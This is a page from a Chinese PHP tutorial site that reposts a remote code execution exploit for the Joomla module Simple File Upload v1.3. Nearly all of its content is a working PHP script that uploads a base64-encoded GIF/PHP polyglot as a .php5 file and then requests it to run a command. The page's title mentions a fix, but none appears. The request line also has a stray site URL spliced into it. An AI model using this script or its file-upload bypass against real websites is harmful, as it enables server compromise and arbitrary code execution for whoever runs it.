网站地图    收藏   

子栏目

主页 > 后端 > 网站安全 >

Joomla模块Simple File Upload v1.3远程代码执行缺陷及修

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] ?PHP/* -------------------------------------------------------------------------------- 标题: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit -------------......

 

<?PHP 

 

  

 

/* 

 

    -------------------------------------------------------------------------------- 

 

   标题: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit 

 

    -------------------------------------------------------------------------------- 

作者: gmda  www.2cto.com gmda[at]email[dot]it 

网站: http://www.gmda.altervista.org/ 

软件地址: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip 

受影响版本: 1.3 

测试平台: winxp php version 5.3.2  Apache 2.0 

 

      

 

    *the setup of the module is no captcha other setups are the default* 

 

       

 

    +-------------------------------------------------------------------------+ 

 

    | 仅供技术交流,使用者风险自担                                            |

 

    +-------------------------------------------------------------------------+ 

 

       

 

    The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly. 

 

    This thing can be a bad intent to send commands to the server running clearly causing safety problems ........ 

 

    The script has peroblemi upload quality control ..... 

 

    

 

    

 

*/

 

  

 

  

 

$host="127.0.0.1"; 

 

$port=80; 

 

$shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg=="; 

 

$ContentType="image/gif"; 

 

$post="POST http://www.2cto.com /Joomla_1.5.23_ita-Stable_test_expl/index.php"; 

 

$fp = fsockopen($host, $port, $errno, $errstr, 30); 

 

$filename="file.php5"; 

 

if(!$fp) die($errstr.$errno); else { 

 

 

                $data="-----------------------------41184676334\r\n"; 

 

                $data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n"; 

 

                $data.="\r\n"; 

 

                $data.="100000\r\n-----------------------------41184676334\r\n"; 

 

                $data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n"; 

 

                $data.="\r\n\r\n"; 

 

                $data.="-----------------------------41184676334\r\n"; 

 

                $data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n"; 

 

                $data.=base64_decode($shell)."\r\n"; 

 

                $data.="-----------------------------41184676334--\r\n"; 

 

             $packet="$post HTTP/1.1\r\n"; 

 

                $packet.="Host: ".$host.":".$port."\r\n"; 

 

                $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n"; 

 

                $packet.="Content-Length: ".strlen($data)."\r\n"; 

 

                $packet.="Connection: Close\r\n\r\n"; 

 

                $packet.=$data; 

 

  

 

fwrite($fp, $packet); 

 

    fclose($fp); 

 

      

    

 

 

  

 

    $h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r"); 

 

      if ($h) { 

 

            while (($buf = fgets($h, 4096)) !== false) { 

 

             echo $buf; 

 

             echo("exploit was successful"); 

 

   }  

 

     

 

    fclose($h); 

 

    }else{ 

 

     echo("Error: exploit fail"); 

 

   } 

 

?>

最新评论

    加载更多~~

    添加评论

    更多文章推荐

    自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

    京ICP备14009008号-1@版权所有www.zixuephp.com

    网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

    添加评论